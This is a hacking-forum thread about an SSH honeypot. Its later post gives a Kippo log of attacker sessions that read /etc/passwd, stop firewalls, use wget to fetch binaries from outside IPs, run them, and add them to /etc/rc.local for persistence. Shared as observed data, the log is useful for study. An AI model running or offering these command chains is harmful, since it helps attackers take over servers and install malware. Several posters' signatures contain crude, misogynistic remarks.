Author Topic: 1 day of running a SSH honeypot  (Read 6186 times)


Darkvision
Re: 1 day of running a SSH honeypot
« Reply #15 on: September 17, 2014, 09:54:26 pm »
chapp, I wasn't saying he was trying to brute force the login; I was talking about the absurdity of trying to use a 19 digit "word" that isn't a default password hoping to get a "lucky" guess. Since the idea of these kind of bots is to automate getting into as many places as possible, using something that has virtually no chance of ever doing so is a big head scratcher. To put it another way, you could replace that entry with any randomly generated 16 digit word and still have a far greater (and still insanely small) chance of randomly getting access, or better yet with say an 8 digit string, and have a "decent (in relative terms)" but small chance. Since this isn't brute force and "random" strings, any actual word would be far more likely to work. So yes, he can disregard it as a chance to work at random. It has no place as a "random" dictionary word, which was my original point. That being said, it very well could be placed with intent trying to get access to something still set up with a default password, maybe it's a troll password just to make a sysadmin scratch their head at his word list, maybe it's the universal code for infinite lives (my money is on the last one). Anyway, hope that clears things up.
The internet: where men are men, women are men, and children are FBI agents.

Ahh, EvilZone.  Where networking certification meets avian fecal matter & all is explained, for better or worse.

<Phage> I used an entrence I never use

lucid
Re: 1 day of running a SSH honeypot
« Reply #16 on: September 18, 2014, 05:24:11 am »
We are getting off topic here my bitches and hoes. Let's get back on track.
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

HTH
Re: 1 day of running a SSH honeypot
« Reply #17 on: September 18, 2014, 06:01:13 am »
Most of the login attempts I see aren't totally retarded passwords. Lots are actually decent, I lol'd that your pw was 123456 btw. Anyway... What I find peculiar is actually the first five login attempts...
Dude tries one pwd, doesn't work
Tries another, works!
Half an hour break...
Dude in same general area (possibly first person after poop? router goes down? who knows) then comes in
tries the EXACT same first try as the first guy (not bad odds given the password but still, with the first three bytes of the IP address being the same and all...)
Then is successful...
Then CONTINUES to try passwords! hahaha Noob who didn't set up his tool properly?

What do ya guys think?
<ande> HTH is love, HTH is life
<TurboBorland> hth is the only person on this server I can say would successfully spitefuck peoples women

lucid
Re: 1 day of running a SSH honeypot
« Reply #18 on: September 18, 2014, 07:03:08 pm »
Maybe he successfully logged in but then suddenly thought: "This shit is illegal! I should spoof my IP." So he used a proxy that was three blocks from his house and then tried again, feeling absolutely sure he was 100% pure anonymous

EDIT: In reality, I'm betting that person had a dynamic IP and it changed at the beginning of the logs.

Also, maybe he wrote that tool himself, and instead of scanning a random range like he thought it would, it just keeps trying one IP address no matter what.
« Last Edit: September 18, 2014, 07:06:13 pm by lucid »

proxx
Re: 1 day of running a SSH honeypot
« Reply #19 on: September 18, 2014, 08:07:04 pm »
> Maybe he successfully logged in but then suddenly thought: "This shit is illegal! I should spoof my IP." So he used a proxy that was three blocks from his house and then tried again, feeling absolutely sure he was 100% pure anonymous
>
> EDIT: In reality, I'm betting that person had a dynamic IP and it changed at the beginning of the logs.
>
> Also, maybe he wrote that tool himself, and instead of scanning a random range like he thought it would, it just keeps trying one IP address no matter what.

Well, I checked some of those IPs; they are blacklisted for scanning, bruteforce etc.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

ande
Re: 1 day of running a SSH honeypot
« Reply #20 on: September 18, 2014, 08:33:15 pm »
Just for shits and giggles: Since 8th of December 2013 till now EZ has gotten 168 176 SSH connection attempts.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

chapp
Re: 1 day of running a SSH honeypot
« Reply #21 on: September 19, 2014, 12:30:42 pm »
> Just for shits and giggles: Since 8th of December 2013 till now EZ has gotten 168 176 SSH connection attempts.

But any successful logins from unknown parties ;)?

Kulverstukas
Re: 1 day of running a SSH honeypot
« Reply #22 on: September 19, 2014, 04:02:35 pm »
Obviously not...

proxx
Re: 1 day of running a SSH honeypot
« Reply #23 on: September 25, 2014, 01:23:18 pm »
> You wouldn't need to scan every IPv4 address, you could skip the private ranges (eg. 192.168.0.0/16, etc), and depending on the target, certain organizations and foreign countries. Looking at this map of IPv4 addresses from March '14, you could skip a good amount of the IPv4 address space that's not even being used. There are a lot of unallocated and unrouted blocks, and some of the used blocks look like they're barely allocated. Most of the used addresses won't even be running a SSHD, so I don't think it would take too long.

Even if it cuts in half, you have a point but it is still highly unlikely.

nozzlechunks
Re: 1 day of running a SSH honeypot
« Reply #24 on: June 23, 2015, 09:04:02 pm »
Necropost, at Proxx's suggestion.

Here's some honeypot logs containing post log-in activity. I was running Kippo with the fake shell environment. What you see, generally, is scripted activity, and it's by the numbers. Show up, look for passwords, then try to turn off the firewall via iptables and pull down files. None of the files were pulled down, of course, but I was able to hit a few of the download IPs and pull down that and more because they left directory traversal on.

Some interesting callouts... there are a number of techniques used to turn off the firewall, from IP Tables, all the way down to commands specific to certain NIX distros. Also, some of them actually tried to pull down distros to install on my box.

It took a while to find this, but I think I have more logs lying around. I'm also gonna' be playing with more honeypots later this summer, so I anticipate more to share.

Thanks for looking!

*Note, the long string is the session ID, so you can see every event that occurs in a particular session.


Code: [Select]
1,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:46",\N,1,"ls"
2,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:48",\N,1,"whoami"
3,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:53",\N,1,"cat /etc/pa"
4,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:26:57",\N,1,"cat /etc/passwd"
5,"d481490048f011e4a63502b6d5d64ab8","2014-09-30 22:27:00",\N,1,"exit"
6,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:15",\N,1,"ls"
7,"72d8fc1448f211e4a63502b6d5d64ab8","2014-09-30 22:38:16",\N,1,"exit"
8,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:28",\N,1,"cat /etc/passwd"
9,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:30",\N,1,"exit"
10,"29f7da2848f311e482800254c1a985ea","2014-09-30 22:43:31",\N,0,"quit"
11,"3a11f5444bc111e4b273024542c06214","2014-10-04 12:23:26",\N,1,"echo \"WinSCP: this is end-of-file:0\""
12,"486114e04bc111e4b273024542c06214","2014-10-04 12:23:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
13,"5dd168204bc111e4b273024542c06214","2014-10-04 12:24:25",\N,1,"echo \"WinSCP: this is end-of-file:0\""
14,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:02",\N,1,"ls"
15,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:10",\N,1,"uname -a"
16,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:22",\N,0,"http://120.24.62.114:8989/txma"
17,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:30",\N,0,"http://120.24.62.114:8989/txma"
18,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:35",\N,1,"wget http://120.24.62.114:8989/txma"
19,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:49:44",\N,0,"service iptables stop"
20,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:03",\N,1,"wget http://120.24.62.114:8989/txma"
21,"b21599564bee11e4b3d002b6d5d64ab8","2014-10-04 17:50:38",\N,1,"ls"
22,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:06",\N,1,"wget http://120.24.62.114:8989/txma"
23,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:51:16",\N,1,"uname -a"
24,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:52:45",\N,0,"http://120.24.62.114:8989/qqwwqqww"
25,"fc953efa4bee11e4b3d002b6d5d64ab8","2014-10-04 17:53:13",\N,0,"service iptables stop"
26,"307e51b44caf11e4b3d002b6d5d64ab8","2014-10-05 16:46:57",\N,1,"uname -a"
27,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:17",\N,0,"/etc/init.d/iptables stop"
28,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:21",\N,0,"service iptables stop"
29,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:25",\N,0,"SuSEfirewall2 stop"
30,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:29",\N,0,"reSuSEfirewall2 stop"
31,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:33",\N,1,"cd /tmp"
32,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:37",\N,1,"wget -c http://42.96.191.5:300/dd-wrt"
33,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:41",\N,1,"chmod 777 dd-wrt"
34,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:45",\N,0,"./dd-wrt"
35,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:49",\N,1,"wget -c http://42.96.191.5:300/Linux2.4"
36,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:53",\N,1,"chmod 777 Linux2.4"
37,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:23:57",\N,0,"./Linux2.4"
38,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:01",\N,1,"wget -c http://42.96.191.5:300/Linux2.6"
39,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:05",\N,1,"chmod 777 Linux2.6"
40,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:09",\N,0,"./Linux2.6"
41,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:13",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
42,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:17",\N,1,"chmod 777 linux-arm"
43,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:21",\N,0,"./linux-arm"
44,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:25",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
45,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:29",\N,1,"chmod 777 linux-mips"
46,"a0997bec501311e4b3d002b6d5d64ab8","2014-10-10 00:24:33",\N,0,"./linux-mips"
47,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:11",\N,0,"/etc/init.d/iptables stop"
48,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:15",\N,0,"service iptables stop"
49,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:19",\N,0,"SuSEfirewall2 stop"
50,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:23",\N,0,"reSuSEfirewall2 stop"
51,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:27",\N,1,"cd /tmp"
52,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:31",\N,1,"wget -c http://42.96.191.5:300/G32"
53,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:35",\N,1,"chmod 0755 /tmp/G32"
54,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:39",\N,0,"./G32 &"
55,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:43",\N,1,"wget -c http://42.96.191.5:300/G64"
56,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:47",\N,1,"chmod 0755 /tmp/G64"
57,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:51",\N,0,"./G64 &"
58,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:55",\N,1,"wget -c http://42.96.191.5:300/FreeBsd"
59,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:34:59",\N,1,"chmod 0755 /tmp/FreeBsd"
60,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:03",\N,0,"./FreeBsd &"
61,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:07",\N,1,"wget -c http://42.96.191.5:300/linux-arm"
62,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:11",\N,1,"chmod 0755 /tmp/linux-arm"
63,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:15",\N,0,"./linux-arm &"
64,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:19",\N,1,"wget -c http://42.96.191.5:300/linux-mips"
65,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:23",\N,1,"chmod 0755 /tmp/linux-mips"
66,"7ad5789451a711e4b3d002b6d5d64ab8","2014-10-12 00:35:27",\N,0,"./linux-mips &"
67,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:45",\N,1,"wget http://117.21.173.140:7000/lele"
68,"dddea0c252f211e482800254c1a985ea","2014-10-13 16:06:49",\N,1,"wget http://117.21.173.140:7000/lele"
69,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:30",\N,0,"service iptables stop"
70,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:37",\N,1,"wget wget http://222.186.34.123:123/1995xxoo"
71,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:44",\N,1,"chmod u+x 1995xxoo"
72,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:51",\N,0,"./1995xxoo &"
73,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:40:58",\N,1,"wget http://222.186.34.123:123/xxoo1995"
74,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:05",\N,1,"chmod u+x xxoo1995"
75,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:12",\N,0,"./xxoo1995 &"
76,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:19",\N,1,"cd /tmp"
77,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
78,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:33",\N,1,"echo \"./1995xxoo\">>/etc/rc.local"
79,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:40",\N,1,"echo \"./xxoo1995&\">>/etc/rc.local"
80,"aec0c0e45ca811e4b3d002b6d5d64ab8","2014-10-26 00:41:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
81,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:01",\N,0,"service iptables stop"
82,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:08",\N,1,"wget http://222.186.34.123:123/rrmr"
83,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:15",\N,1,"chmod u+x rrmr"
84,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:22",\N,0,"./rrmr &"
85,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:29",\N,1,"wget http://222.186.34.123:123/mmrr"
86,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:36",\N,1,"chmod u+x mmrr"
87,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:43",\N,0,"./mmrr &"
88,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:50",\N,1,"wget http://222.186.34.123:123/qgg"
89,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:11:57",\N,1,"chmod u+x qgg"
90,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:04",\N,0,"./qgg &"
91,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:11",\N,1,"cd /tmp"
92,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:18",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
93,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:25",\N,1,"echo \"./rrmr\">>/etc/rc.local"
94,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:32",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
95,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:39",\N,1,"echo \"./qgg&\">>/etc/rc.local"
96,"f0d791485cac11e4b3d002b6d5d64ab8","2014-10-26 01:12:46",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
97,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:13",\N,0,"service iptables stop"
98,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:20",\N,1,"wget http://222.186.34.123:123/rrmr"
99,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:27",\N,1,"chmod u+x rrmr"
100,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:34",\N,0,"./rrmr &"
101,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:41",\N,1,"wget http://222.186.34.123:123/mmrr"
102,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:48",\N,1,"chmod u+x mmrr"
103,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:39:55",\N,0,"./mmrr &"
104,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:02",\N,1,"wget http://222.186.34.123:123/qgg"
105,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:09",\N,1,"chmod u+x qgg"
106,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:16",\N,0,"./qgg &"
107,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:23",\N,1,"cd /tmp"
108,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:30",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
109,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:37",\N,1,"echo \"./rrmr\">>/etc/rc.local"
110,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:44",\N,1,"echo \"./mmrr&\">>/etc/rc.local"
111,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:51",\N,1,"echo \"./qgg&\">>/etc/rc.local"
112,"e269cdde5cb011e4b3d002b6d5d64ab8","2014-10-26 01:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
113,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:31",\N,1,"wget http://118.244.150.49:8889/ooxx59"
114,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:38",\N,1,"chmod +x ooxx59"
115,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:45",\N,0,"./ooxx59"
116,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:52",\N,1,"chattr +i ooxx59"
117,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:26:59",\N,1,"wget http://118.244.150.49:8889/ooxx95"
118,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:06",\N,1,"chmod +x ooxx95"
119,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:13",\N,0,"./ooxx95"
120,"a297d15e5cd011e4b3d002b6d5d64ab8","2014-10-26 05:27:20",\N,1,"chattr +i ooxx95"
121,"7d478f0c5eba11e4b3d002b6d5d64ab8","2014-10-28 15:53:22",\N,1,"uname -a"
122,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:01",\N,0,"service iptables stop"
123,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:08",\N,1,"wget http://222.186.34.120:8899/ttz32"
124,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:14",\N,1,"chmod u+x ttz32"
125,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:20",\N,0,"./ttz32 &"
126,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:26",\N,1,"cd /tmp"
127,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:32",\N,1,"wget http://222.186.34.120:8899/ttz24"
128,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:38",\N,1,"chmod u+x ttz24"
129,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:44",\N,0,"./ttz24 &"
130,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:50",\N,1,"cd /tmp"
131,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:12:56",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
132,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:02",\N,1,"echo \"./ttz32&\">>/etc/rc.local"
133,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:08",\N,1,"echo \"./ttz24&\">>/etc/rc.local"
134,"abf77b74656211e4b3d002b6d5d64ab8","2014-11-06 03:13:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
135,"edefd36a65c011e4b273024542c06214","2014-11-06 14:26:49",\N,1,"echo \"WinSCP: this is end-of-file:0\""
136,"39265708667c11e4b273024542c06214","2014-11-07 12:47:47",\N,1,"uname -a"
137,"b8065b4266a711e482800254c1a985ea","2014-11-07 17:58:57",\N,1,"wget http://204.44.104.93:8080/iten32"
138,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:51",\N,0,"/etc/init.d/iptables stop"
139,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:55",\N,1,"wget http://204.44.104.93:8080/iten32"
140,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:43:59",\N,1,"chmod 0755 iten32"
141,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:03",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
142,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:07",\N,1,"wget http://204.44.104.93:8080/iten64"
143,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:11",\N,1,"chmod 0755 iten64"
144,"35ac8e10670a11e482800254c1a985ea","2014-11-08 05:44:15",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
145,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:06",\N,0,"/etc/init.d/iptables stop"
146,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:16",\N,1,"wget http://204.44.104.93:8080/iten32"
147,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:26",\N,1,"chmod 0755 iten32"
148,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:36",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
149,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:46",\N,1,"wget http://204.44.104.93:8080/iten64"
150,"2300244e672211e482800254c1a985ea","2014-11-08 08:35:56",\N,1,"chmod 0755 iten64"
151,"2300244e672211e482800254c1a985ea","2014-11-08 08:36:06",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
152,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:40",\N,0,"/etc/init.d/iptables stop"
153,"06f0d958677011e482800254c1a985ea","2014-11-08 17:52:50",\N,1,"wget http://204.44.104.93:8080/iten32"
154,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:00",\N,1,"chmod 0755 iten32"
155,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:10",\N,1,"nohup ./iten32> /dev/null 2>&1 &"
156,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:20",\N,1,"wget http://204.44.104.93:8080/iten64"
157,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:30",\N,1,"chmod 0755 iten64"
158,"06f0d958677011e482800254c1a985ea","2014-11-08 17:53:40",\N,1,"nohup ./iten64 > /dev/null 2>&1 &"
159,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:30:58",\N,0,"service iptables stop"
160,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:03",\N,1,"wget http://60.169.74.173:8889/ux24"
161,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:08",\N,1,"chmod u+x ux24"
162,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:13",\N,0,"./ux24 &"
163,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:18",\N,1,"cd /tmp"
164,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:23",\N,1,"wget http://60.169.74.173:8889/ux32"
165,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:28",\N,1,"chmod u+x ux32"
166,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:33",\N,0,"./ux32 &"
167,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:38",\N,1,"cd /tmp"
168,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:43",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
169,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:48",\N,1,"echo \"./ux24&\">>/etc/rc.local"
170,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:53",\N,1,"echo \"./ux32&\">>/etc/rc.local"
171,"65f31442682511e4b3d002b6d5d64ab8","2014-11-09 15:31:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
172,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:32",\N,0,"service iptables stop"
173,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:38",\N,1,"wget http://60.169.74.173:8889/ha32"
174,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:44",\N,1,"chmod u+x ha32"
175,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:50",\N,0,"./ha32 &"
176,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:43:56",\N,1,"cd /tmp"
177,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:02",\N,1,"wget http://60.169.74.173:8889/ha24"
178,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:08",\N,1,"chmod u+x ha24"
179,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:14",\N,0,"./ha24 &"
180,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:20",\N,1,"cd /tmp"
181,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:26",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
182,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:32",\N,1,"echo \"./ha32&\">>/etc/rc.local"
183,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:38",\N,1,"echo \"./ha24&\">>/etc/rc.local"
184,"8762bccc682f11e4b3d002b6d5d64ab8","2014-11-09 16:44:44",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
185,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:35",\N,0,"service iptables stop"
186,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:41",\N,1,"wget http://60.169.79.211:8080/jiuwu"
187,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:47",\N,1,"chmod u+x jiuwu"
188,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:53",\N,0,"./jiuwu &"
189,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:29:59",\N,1,"cd /tmp"
190,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:05",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
191,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:11",\N,1,"echo \"./jiuwu&\">>/etc/rc.local"
192,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:17",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
193,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:45",\N,0,"service iptables stop"
194,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:50",\N,1,"wget http://222.186.34.123:8889/mu24"
195,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:55",\N,1,"chmod u+x mu24"
196,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:00",\N,0,"./mu24 &"
197,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:05",\N,1,"cd /tmp"
198,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
199,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:15",\N,1,"echo \"./mu24&\">>/etc/rc.local"
200,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:20",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
201,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:12",\N,1,"w"
202,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:16",\N,1,"uname -a"
203,"2c2d946c6a4611e4b3d002b6d5d64ab8","2014-11-12 08:30:42",\N,1,"echo \"WinSCP: this is end-of-file:0\""
204,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:55",\N,0,"54.69.25.214"
205,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:57",\N,0,"netstat"
206,"81d5ad7c6b4611e4b273024542c06214","2014-11-13 15:05:33",\N,1,"echo \"WinSCP: this is end-of-file:0\""
207,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:14",\N,1,"ls"
